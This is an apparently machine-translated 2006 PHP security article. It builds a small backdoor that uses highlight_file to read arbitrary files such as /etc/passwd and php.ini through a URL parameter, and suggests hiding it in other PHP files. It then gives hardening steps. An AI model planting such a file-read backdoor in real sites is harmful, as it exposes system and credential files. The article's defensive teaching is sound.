Function
[Backdoor Construction]
We know PHP is very powerful, and there are a lot of interesting features, such as it comes with a PHP code highlighted function, called: highlight_string, its argument is a string, if the string contains PHP code, then it will highlight, And the output is directly in the browser.
For example, the following code:
<?php
Highlight_string (' <?php phpinfo ();?> ');
?>
After execution, output in the browser:
<code><font color= "#000000" >
<font color= "#0000BB" ><?php phpinfo</font><font color= "#007700" > (); </font><font color= "#0000BB" >?></font>
</font>
</code>
Displays the color of the code, which can be set in the php.ini file, php.ini with the following options:
; highlight.string = #DD0000
; highlight.comment = #FF9900
; Highlight.keyword = #007700
; highlight.bg = #FFFFFF
; Highlight.default = #0000BB
; highlight.html = #000000
This is the direct display of string color, then I want to display the entire PHP file? There are also functions: Highlight_file, the function argument is the filename or file path. This function is similar to the function above, but it submits a path to a file.
So the key to our little back door is here, which is probably we use the Highlight_file function to help us read any file in the system, and now we construct a test code.
<?php
$file = $_get[' F '];
$file = $file? $file: __file__;
Highlight_file ($file);
?>
The code's general function is to submit a variable named F in the URL to the php file path where the code needs to be highlighted, and then the program calls the Highlight_file function to display the file. The file is then saved to the public_html directory in my personal home directory, and the file name is test.php.
Now we use Firefox to open: http://192.168.0.1/~heiyeluren/test.php, return the contents of our test.php file, now we access passwd file to see: http:// 192.168.0.1/~heiyeluren/test.php?f=/etc/passwd
A lot of user information is displayed on the page immediately:
Root:x:0:0:root:/root:/bin/bash
Bin:x:1:1:bin:/bin:/sbin/nologin
Daemon:x:2:2:daemon:/sbin:/sbin/nologin
......
Let's look at the PHP profile php.ini information:
Http://192.168.0.1/~heiyeluren/test.php?f=/usr/local/php/lib/php.ini
It immediately shows:
[PHP]
;;;;;;;;;;;
; WARNING;
;;;;;;;;;;;
; This is the default settings file for new PHP installations.
; By default, PHP installs itself with a configuration suitable for
; development purposes, and *not* for production purposes.
; For several security-oriented considerations the should be taken
; Before going online with your site, please consult php.ini-recommended
; and http://php.net/manual/en/security.php.
......
It seems that as long as permissions allow, many files can be read directly, poses a great threat to our system. In other words, if the above code is inserted into any other directly accessible PHP file in the current web system, activated by a special face, and the average programmer is not so careful to check every PHP program file, then a malicious user can view our system files anytime, anywhere.
[System Guard]
So what if you prevent it, or do you say no to a similar problem? Because, similarly, PHP has very many file access functions, such as files, file_get_contents, ReadFile and other functions, how do we prevent these functions from the threat?
Workaround One:
If the system is only interacting with the database, then you can completely block these file access functions, such as fopen, file, file_get_contents, ReadFile, Opendir and other functions, The method is to prohibit in the PHP configuration file php.ini, PHP.ini has an option called disable_functions, we can put the function that needs to be shielded inside:
Disable_functions = Highlight_file,fopen,file,file_get_contents,readfile,opendir
So the above functions are not available, such as you call the Highlight_file function, then the PHP engine will prompt you:
Warning:highlight_file () has been disabled for security reasons in/home/heiyeluren/public_html/test.php on line 5
Of course, we can't kill all, just say you can ban the basic not how to use the functions, such as Highlight_file I think the use of relatively few.
Workaround Two:
The first method is too mandatory, the function will not be able to access the function, is always not so suitable for some space providers, it is unreasonable, then there is a solution, or configure our php.ini, open PHP security mode:
Safe_mode = On
Of course, if you need, it is best to configure the Open_basedir and other options to better control, specific reference to the PHP manual.
When we open the PHP safe mode, we will visit the/etc/passwd and submit the URL:
http://192.168.0.1/~heiyeluren/test.php?f=/etc/passwd
Then the browser will immediately show:
Warning:highlight_file () [Function.highlight-file]: SAFE MODE restriction in effect. The script whose uid is??? allowed to access/etc/passwd owned by UID 0 in/home/heiyeluren/public_html/test.php o N Line 5
Workaround Three:
Without losing our PHP powerful function, those functions can be used normally, the prevention method is to set up our system in various directories of different access rights, such as our/etc/passwd files. For example, the default is this permission:
[~]# Ls-al/usr/local/php/lib/php.ini
-rw-r--r--1 root root 41489 5 12:40/usr/local/php/lib/php.ini
Our settings are not easily readable:
[~]# chmod 640/usr/local/php/lib/php.ini
[~]# Ls-al/usr/local/php/lib/php.ini
-rw-r-----1 root root 1865 Nov 01:16/usr/local/php/lib/php.ini
Now, we are visiting Http://192.168.0.1/~heiyeluren/test.php?f=/usr/local/php/lib/php.ini to see:
Warning:highlight_file (/usr/local/php/lib/php.ini) [Function.highlight-file]: failed to open stream:permission Denied in/home/heiyeluren/public_html/test.php on line 5
Warning:highlight_file () [Function.highlight-file]: Failed opening '/usr/local/php/lib/php.ini ' for highlighting in/ Home/heiyeluren/public_html/test.php on line 5
The warning says that there is no permission to read/usr/local/php/lib/php.ini This file and successfully achieve our goal.
Conclusion
PHP is very powerful, I hope more developers realize this, early use of this powerful language. Language is strong, of course, security will also become a problem, whether we are developers or system administrators, we need to close communication, to make our system safe and easy to use. We need to work hard to find a good bonding point between powerful features and security.
Write by Heiyeluren
2006-03-05 13:35